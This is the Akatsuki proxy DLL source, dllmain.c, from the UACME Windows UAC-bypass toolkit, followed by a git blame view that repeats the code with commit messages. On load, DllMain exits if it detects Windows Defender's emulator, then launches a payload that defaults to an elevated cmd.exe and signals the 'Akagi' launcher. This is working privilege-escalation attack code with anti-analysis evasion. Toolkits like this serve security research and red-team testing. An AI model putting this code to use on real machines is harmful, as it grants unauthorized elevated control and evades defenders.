UACME/Source/Akatsuki/dllmain.c

/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2016 - 2019
*
*  TITLE:       DLLMAIN.C
*
*  VERSION:     3.17
*
*  DATE:        20 Mar 2019
*
*  Proxy dll entry point, Akatsuki.
*  Special dll for wow64 logger method.
*  Akatsuki must be special, isn't it?
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/

#if !defined UNICODE
#error ANSI build is not supported
#endif

#include "shared\shared.h"
#include "shared\libinc.h"

#define LoadedMsg      TEXT("Akatsuki lock and loaded")

HANDLE g_SyncMutant = NULL;

UACME_PARAM_BLOCK g_SharedParams;


/*
* DummyFunc
*
* Purpose:
*
* Stub for fake exports.
*
*/
VOID WINAPI DummyFunc(
    VOID
)
{

}

/*
* DbgDumpRuntimeInfo
*
* Purpose:
*
* Dump runtime info to the file, this routine is only for debug builds.
*
*/
VOID DbgDumpRuntimeInfo()
{
    HANDLE hFile = INVALID_HANDLE_VALUE;
    WCHAR szReportName[MAX_PATH * 2];
    WCHAR sysdir[MAX_PATH + 1];

    DWORD cch;
    LPWSTR lpText = NULL;

    DWORD bytesIO;
    WCHAR ch;

    cch = ucmExpandEnvironmentStrings(L"%temp%\\", sysdir, MAX_PATH);
    if ((cch != 0) && (cch < MAX_PATH)) {
        _strcpy(szReportName, sysdir);
        _strcat(szReportName, TEXT("report_"));
        ultostr(GetCurrentProcessId(), _strend(szReportName));
        _strcat(szReportName, TEXT(".txt"));

        hFile = CreateFile(szReportName, GENERIC_ALL, 0, NULL, CREATE_ALWAYS, 0, NULL);
        if (hFile != INVALID_HANDLE_VALUE) {

            ch = (WCHAR)0xFEFF;
            WriteFile(hFile, &ch, sizeof(WCHAR), &bytesIO, NULL);

            lpText = ucmQueryRuntimeInfo(TRUE);
            if (lpText) {
                WriteFile(hFile, lpText, (DWORD)(_strlen(lpText) * sizeof(WCHAR)), &bytesIO, NULL);
                ucmDestroyRuntimeInfo(lpText);
            }
            CloseHandle(hFile);
        }
    }
}

/*
* DefaultPayload
*
* Purpose:
*
* Process parameter if exist or start cmd.exe and exit immediatelly.
*
*/
VOID DefaultPayload(
    VOID
)
{
    BOOL bSharedParamsReadOk;
    UINT ExitCode;
    PWSTR lpParameter;
    ULONG cbParameter;

    BOOL bIsLocalSystem = FALSE;
    ULONG SessionId;

    if (ucmCreateSyncMutant(&g_SyncMutant) == STATUS_OBJECT_NAME_COLLISION)
        ExitProcess(0);

    //
    // Read shared params block.
    //
    RtlSecureZeroMemory(&g_SharedParams, sizeof(g_SharedParams));
    bSharedParamsReadOk = ucmReadSharedParameters(&g_SharedParams);
    if (bSharedParamsReadOk) {
        lpParameter = g_SharedParams.szParameter;
        cbParameter = (ULONG)(_strlen(g_SharedParams.szParameter) * sizeof(WCHAR));
        SessionId = g_SharedParams.SessionId;
    }
    else {
        lpParameter = NULL;
        cbParameter = 0UL;
        SessionId = 0;
    }

    ucmIsLocalSystem(&bIsLocalSystem);

    ExitCode = (ucmLaunchPayload2(
        bIsLocalSystem, 
        SessionId, 
        lpParameter, 
        cbParameter) != FALSE);

    //
    // Notify Akagi.
    //
    if (bSharedParamsReadOk) {
        ucmSetCompletion(g_SharedParams.szSignalObject);
    }

    ExitProcess(ExitCode);
}

/*
* DllMain
*
* Purpose:
*
* Proxy dll entry point.
*
*/
BOOL WINAPI DllMain(
    _In_ HINSTANCE hinstDLL,
    _In_ DWORD fdwReason,
    _In_ LPVOID lpvReserved
)
{
    UNREFERENCED_PARAMETER(hinstDLL);
    UNREFERENCED_PARAMETER(lpvReserved);

    if (wdIsEmulatorPresent() == STATUS_NEEDS_REMEDIATION)
        ExitProcess('Foff');

    if (fdwReason == DLL_PROCESS_ATTACH) {
        OutputDebugString(LoadedMsg);
        //DbgDumpRuntimeInfo();
        DefaultPayload();
    }
    return TRUE;
}
v 2.7.0 Wow64 logger added as #30, newest Enigma0x3 method added as #31, overall program redesign and rewrite of several methods, fixes and Simda method #5 works again (fixed regression of previous builds), Yuubari updated for Win10 rs2 15063. 2017-03-25 12:39:31 +00:00			`/*******************************************************************************`
			`*`
v 3.1.7 Final 3.1.7 commit. 2019-03-23 06:47:36 +00:00			`* (C) COPYRIGHT AUTHORS, 2016 - 2019`
v 2.7.0 Wow64 logger added as #30, newest Enigma0x3 method added as #31, overall program redesign and rewrite of several methods, fixes and Simda method #5 works again (fixed regression of previous builds), Yuubari updated for Win10 rs2 15063. 2017-03-25 12:39:31 +00:00			`*`
			`* TITLE: DLLMAIN.C`
			`*`
v 3.1.7 Final 3.1.7 commit. 2019-03-23 06:47:36 +00:00			`* VERSION: 3.17`
v 2.7.0 Wow64 logger added as #30, newest Enigma0x3 method added as #31, overall program redesign and rewrite of several methods, fixes and Simda method #5 works again (fixed regression of previous builds), Yuubari updated for Win10 rs2 15063. 2017-03-25 12:39:31 +00:00			`*`
v 3.1.7 Final 3.1.7 commit. 2019-03-23 06:47:36 +00:00			`* DATE: 20 Mar 2019`
v 2.7.0 Wow64 logger added as #30, newest Enigma0x3 method added as #31, overall program redesign and rewrite of several methods, fixes and Simda method #5 works again (fixed regression of previous builds), Yuubari updated for Win10 rs2 15063. 2017-03-25 12:39:31 +00:00			`*`
			`* Proxy dll entry point, Akatsuki.`
			`* Special dll for wow64 logger method.`
			`* Akatsuki must be special, isn't it?`
			`*`
			`* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF`
			`* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED`
			`* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A`
			`* PARTICULAR PURPOSE.`
			`*`
			`*******************************************************************************/`

			`#if !defined UNICODE`
			`#error ANSI build is not supported`
			`#endif`

v 3.1.0 Rearrange due to headers update. 2018-11-21 05:14:29 +00:00			`#include "shared\shared.h"`
v 3.0.3 Visual Studio 2017 build support, readme file updated. 2018-10-11 08:42:35 +00:00			`#include "shared\libinc.h"`
v 2.7.0 Wow64 logger added as #30, newest Enigma0x3 method added as #31, overall program redesign and rewrite of several methods, fixes and Simda method #5 works again (fixed regression of previous builds), Yuubari updated for Win10 rs2 15063. 2017-03-25 12:39:31 +00:00
v 2.8.0 Dynamic link libraries unification update, workaround for Windows 10 RS3 bugfest. 2017-09-08 12:20:05 +00:00			`#define LoadedMsg TEXT("Akatsuki lock and loaded")`

			`HANDLE g_SyncMutant = NULL;`
v 2.7.0 Wow64 logger added as #30, newest Enigma0x3 method added as #31, overall program redesign and rewrite of several methods, fixes and Simda method #5 works again (fixed regression of previous builds), Yuubari updated for Win10 rs2 15063. 2017-03-25 12:39:31 +00:00
v 3.1.0 Internal units rearrange, updates for 19H1 18272. 2018-11-13 09:58:29 +00:00			`UACME_PARAM_BLOCK g_SharedParams;`


v 2.7.0 Wow64 logger added as #30, newest Enigma0x3 method added as #31, overall program redesign and rewrite of several methods, fixes and Simda method #5 works again (fixed regression of previous builds), Yuubari updated for Win10 rs2 15063. 2017-03-25 12:39:31 +00:00			`/*`
			`* DummyFunc`
			`*`
			`* Purpose:`
			`*`
			`* Stub for fake exports.`
			`*`
			`*/`
			`VOID WINAPI DummyFunc(`
			`VOID`
			`)`
			`{`

			`}`

			`/*`
v 2.8.0 Dynamic link libraries unification update, workaround for Windows 10 RS3 bugfest. 2017-09-08 12:20:05 +00:00			`* DbgDumpRuntimeInfo`
v 2.7.0 Wow64 logger added as #30, newest Enigma0x3 method added as #31, overall program redesign and rewrite of several methods, fixes and Simda method #5 works again (fixed regression of previous builds), Yuubari updated for Win10 rs2 15063. 2017-03-25 12:39:31 +00:00			`*`
			`* Purpose:`
			`*`
v 3.1.0 Internal units rearrange, updates for 19H1 18272. 2018-11-13 09:58:29 +00:00			`* Dump runtime info to the file, this routine is only for debug builds.`
v 2.7.0 Wow64 logger added as #30, newest Enigma0x3 method added as #31, overall program redesign and rewrite of several methods, fixes and Simda method #5 works again (fixed regression of previous builds), Yuubari updated for Win10 rs2 15063. 2017-03-25 12:39:31 +00:00			`*`
			`*/`
v 2.8.0 Dynamic link libraries unification update, workaround for Windows 10 RS3 bugfest. 2017-09-08 12:20:05 +00:00			`VOID DbgDumpRuntimeInfo()`
v 2.7.0 Wow64 logger added as #30, newest Enigma0x3 method added as #31, overall program redesign and rewrite of several methods, fixes and Simda method #5 works again (fixed regression of previous builds), Yuubari updated for Win10 rs2 15063. 2017-03-25 12:39:31 +00:00			`{`
v 2.8.0 Dynamic link libraries unification update, workaround for Windows 10 RS3 bugfest. 2017-09-08 12:20:05 +00:00			`HANDLE hFile = INVALID_HANDLE_VALUE;`
			`WCHAR szReportName[MAX_PATH * 2];`
			`WCHAR sysdir[MAX_PATH + 1];`
v 2.7.0 Wow64 logger added as #30, newest Enigma0x3 method added as #31, overall program redesign and rewrite of several methods, fixes and Simda method #5 works again (fixed regression of previous builds), Yuubari updated for Win10 rs2 15063. 2017-03-25 12:39:31 +00:00
v 2.8.0 Dynamic link libraries unification update, workaround for Windows 10 RS3 bugfest. 2017-09-08 12:20:05 +00:00			`DWORD cch;`
			`LPWSTR lpText = NULL;`
v 2.7.0 Wow64 logger added as #30, newest Enigma0x3 method added as #31, overall program redesign and rewrite of several methods, fixes and Simda method #5 works again (fixed regression of previous builds), Yuubari updated for Win10 rs2 15063. 2017-03-25 12:39:31 +00:00
v 2.8.0 Dynamic link libraries unification update, workaround for Windows 10 RS3 bugfest. 2017-09-08 12:20:05 +00:00			`DWORD bytesIO;`
			`WCHAR ch;`
v 2.7.0 Wow64 logger added as #30, newest Enigma0x3 method added as #31, overall program redesign and rewrite of several methods, fixes and Simda method #5 works again (fixed regression of previous builds), Yuubari updated for Win10 rs2 15063. 2017-03-25 12:39:31 +00:00
v 2.8.0 Dynamic link libraries unification update, workaround for Windows 10 RS3 bugfest. 2017-09-08 12:20:05 +00:00			`cch = ucmExpandEnvironmentStrings(L"%temp%\\", sysdir, MAX_PATH);`
			`if ((cch != 0) && (cch < MAX_PATH)) {`
			`_strcpy(szReportName, sysdir);`
			`_strcat(szReportName, TEXT("report_"));`
			`ultostr(GetCurrentProcessId(), _strend(szReportName));`
			`_strcat(szReportName, TEXT(".txt"));`
v 2.7.0 Wow64 logger added as #30, newest Enigma0x3 method added as #31, overall program redesign and rewrite of several methods, fixes and Simda method #5 works again (fixed regression of previous builds), Yuubari updated for Win10 rs2 15063. 2017-03-25 12:39:31 +00:00
v 2.8.0 Dynamic link libraries unification update, workaround for Windows 10 RS3 bugfest. 2017-09-08 12:20:05 +00:00			`hFile = CreateFile(szReportName, GENERIC_ALL, 0, NULL, CREATE_ALWAYS, 0, NULL);`
			`if (hFile != INVALID_HANDLE_VALUE) {`
v 2.7.0 Wow64 logger added as #30, newest Enigma0x3 method added as #31, overall program redesign and rewrite of several methods, fixes and Simda method #5 works again (fixed regression of previous builds), Yuubari updated for Win10 rs2 15063. 2017-03-25 12:39:31 +00:00
v 2.8.0 Dynamic link libraries unification update, workaround for Windows 10 RS3 bugfest. 2017-09-08 12:20:05 +00:00			`ch = (WCHAR)0xFEFF;`
			`WriteFile(hFile, &ch, sizeof(WCHAR), &bytesIO, NULL);`
v 2.7.0 Wow64 logger added as #30, newest Enigma0x3 method added as #31, overall program redesign and rewrite of several methods, fixes and Simda method #5 works again (fixed regression of previous builds), Yuubari updated for Win10 rs2 15063. 2017-03-25 12:39:31 +00:00
v 2.8.0 Dynamic link libraries unification update, workaround for Windows 10 RS3 bugfest. 2017-09-08 12:20:05 +00:00			`lpText = ucmQueryRuntimeInfo(TRUE);`
			`if (lpText) {`
			`WriteFile(hFile, lpText, (DWORD)(_strlen(lpText) * sizeof(WCHAR)), &bytesIO, NULL);`
			`ucmDestroyRuntimeInfo(lpText);`
v 2.7.0 Wow64 logger added as #30, newest Enigma0x3 method added as #31, overall program redesign and rewrite of several methods, fixes and Simda method #5 works again (fixed regression of previous builds), Yuubari updated for Win10 rs2 15063. 2017-03-25 12:39:31 +00:00			`}`
v 2.8.0 Dynamic link libraries unification update, workaround for Windows 10 RS3 bugfest. 2017-09-08 12:20:05 +00:00			`CloseHandle(hFile);`
v 2.7.0 Wow64 logger added as #30, newest Enigma0x3 method added as #31, overall program redesign and rewrite of several methods, fixes and Simda method #5 works again (fixed regression of previous builds), Yuubari updated for Win10 rs2 15063. 2017-03-25 12:39:31 +00:00			`}`
			`}`
			`}`

			`/*`
v 2.8.0 Dynamic link libraries unification update, workaround for Windows 10 RS3 bugfest. 2017-09-08 12:20:05 +00:00			`* DefaultPayload`
v 2.7.0 Wow64 logger added as #30, newest Enigma0x3 method added as #31, overall program redesign and rewrite of several methods, fixes and Simda method #5 works again (fixed regression of previous builds), Yuubari updated for Win10 rs2 15063. 2017-03-25 12:39:31 +00:00			`*`
			`* Purpose:`
			`*`
v 2.8.0 Dynamic link libraries unification update, workaround for Windows 10 RS3 bugfest. 2017-09-08 12:20:05 +00:00			`* Process parameter if exist or start cmd.exe and exit immediatelly.`
v 2.7.0 Wow64 logger added as #30, newest Enigma0x3 method added as #31, overall program redesign and rewrite of several methods, fixes and Simda method #5 works again (fixed regression of previous builds), Yuubari updated for Win10 rs2 15063. 2017-03-25 12:39:31 +00:00			`*`
			`*/`
v 2.8.0 Dynamic link libraries unification update, workaround for Windows 10 RS3 bugfest. 2017-09-08 12:20:05 +00:00			`VOID DefaultPayload(`
			`VOID`
v 2.7.0 Wow64 logger added as #30, newest Enigma0x3 method added as #31, overall program redesign and rewrite of several methods, fixes and Simda method #5 works again (fixed regression of previous builds), Yuubari updated for Win10 rs2 15063. 2017-03-25 12:39:31 +00:00			`)`
			`{`
v 3.1.0 Internal units rearrange, updates for 19H1 18272. 2018-11-13 09:58:29 +00:00			`BOOL bSharedParamsReadOk;`
			`UINT ExitCode;`
			`PWSTR lpParameter;`
			`ULONG cbParameter;`

			`BOOL bIsLocalSystem = FALSE;`
			`ULONG SessionId;`
v 2.8.0 Dynamic link libraries unification update, workaround for Windows 10 RS3 bugfest. 2017-09-08 12:20:05 +00:00
			`if (ucmCreateSyncMutant(&g_SyncMutant) == STATUS_OBJECT_NAME_COLLISION)`
			`ExitProcess(0);`

v 3.1.0 Internal units rearrange, updates for 19H1 18272. 2018-11-13 09:58:29 +00:00			`//`
			`// Read shared params block.`
			`//`
			`RtlSecureZeroMemory(&g_SharedParams, sizeof(g_SharedParams));`
			`bSharedParamsReadOk = ucmReadSharedParameters(&g_SharedParams);`
			`if (bSharedParamsReadOk) {`
			`lpParameter = g_SharedParams.szParameter;`
			`cbParameter = (ULONG)(_strlen(g_SharedParams.szParameter) * sizeof(WCHAR));`
			`SessionId = g_SharedParams.SessionId;`
			`}`
			`else {`
			`lpParameter = NULL;`
			`cbParameter = 0UL;`
			`SessionId = 0;`
			`}`
v 2.8.0 Dynamic link libraries unification update, workaround for Windows 10 RS3 bugfest. 2017-09-08 12:20:05 +00:00
v 3.1.0 Internal units rearrange, updates for 19H1 18272. 2018-11-13 09:58:29 +00:00			`ucmIsLocalSystem(&bIsLocalSystem);`
v 2.8.0 Dynamic link libraries unification update, workaround for Windows 10 RS3 bugfest. 2017-09-08 12:20:05 +00:00
v 3.1.0 Internal units rearrange, updates for 19H1 18272. 2018-11-13 09:58:29 +00:00			`ExitCode = (ucmLaunchPayload2(`
v 2.8.0 Dynamic link libraries unification update, workaround for Windows 10 RS3 bugfest. 2017-09-08 12:20:05 +00:00			`bIsLocalSystem,`
			`SessionId,`
			`lpParameter,`
v 3.1.7 Final 3.1.7 commit. 2019-03-23 06:47:36 +00:00			`cbParameter) != FALSE);`
v 2.8.0 Dynamic link libraries unification update, workaround for Windows 10 RS3 bugfest. 2017-09-08 12:20:05 +00:00
v 3.1.0 Internal units rearrange, updates for 19H1 18272. 2018-11-13 09:58:29 +00:00			`//`
			`// Notify Akagi.`
			`//`
			`if (bSharedParamsReadOk) {`
			`ucmSetCompletion(g_SharedParams.szSignalObject);`
v 2.7.0 Wow64 logger added as #30, newest Enigma0x3 method added as #31, overall program redesign and rewrite of several methods, fixes and Simda method #5 works again (fixed regression of previous builds), Yuubari updated for Win10 rs2 15063. 2017-03-25 12:39:31 +00:00			`}`

v 3.1.0 Internal units rearrange, updates for 19H1 18272. 2018-11-13 09:58:29 +00:00			`ExitProcess(ExitCode);`
v 2.7.0 Wow64 logger added as #30, newest Enigma0x3 method added as #31, overall program redesign and rewrite of several methods, fixes and Simda method #5 works again (fixed regression of previous builds), Yuubari updated for Win10 rs2 15063. 2017-03-25 12:39:31 +00:00			`}`

			`/*`
			`* DllMain`
			`*`
			`* Purpose:`
			`*`
v 2.8.0 Dynamic link libraries unification update, workaround for Windows 10 RS3 bugfest. 2017-09-08 12:20:05 +00:00			`* Proxy dll entry point.`
v 2.7.0 Wow64 logger added as #30, newest Enigma0x3 method added as #31, overall program redesign and rewrite of several methods, fixes and Simda method #5 works again (fixed regression of previous builds), Yuubari updated for Win10 rs2 15063. 2017-03-25 12:39:31 +00:00			`*`
			`*/`
			`BOOL WINAPI DllMain(`
			`_In_ HINSTANCE hinstDLL,`
			`_In_ DWORD fdwReason,`
			`_In_ LPVOID lpvReserved`
			`)`
			`{`
			`UNREFERENCED_PARAMETER(hinstDLL);`
			`UNREFERENCED_PARAMETER(lpvReserved);`

v 2.8.9 Method 48 added, readme updated. 2018-06-15 11:44:01 +00:00			`if (wdIsEmulatorPresent() == STATUS_NEEDS_REMEDIATION)`
			`ExitProcess('Foff');`

v 2.7.0 Wow64 logger added as #30, newest Enigma0x3 method added as #31, overall program redesign and rewrite of several methods, fixes and Simda method #5 works again (fixed regression of previous builds), Yuubari updated for Win10 rs2 15063. 2017-03-25 12:39:31 +00:00			`if (fdwReason == DLL_PROCESS_ATTACH) {`
v 2.8.0 Dynamic link libraries unification update, workaround for Windows 10 RS3 bugfest. 2017-09-08 12:20:05 +00:00			`OutputDebugString(LoadedMsg);`
			`//DbgDumpRuntimeInfo();`
			`DefaultPayload();`
v 2.7.0 Wow64 logger added as #30, newest Enigma0x3 method added as #31, overall program redesign and rewrite of several methods, fixes and Simda method #5 works again (fixed regression of previous builds), Yuubari updated for Win10 rs2 15063. 2017-03-25 12:39:31 +00:00			`}`
			`return TRUE;`
			`}`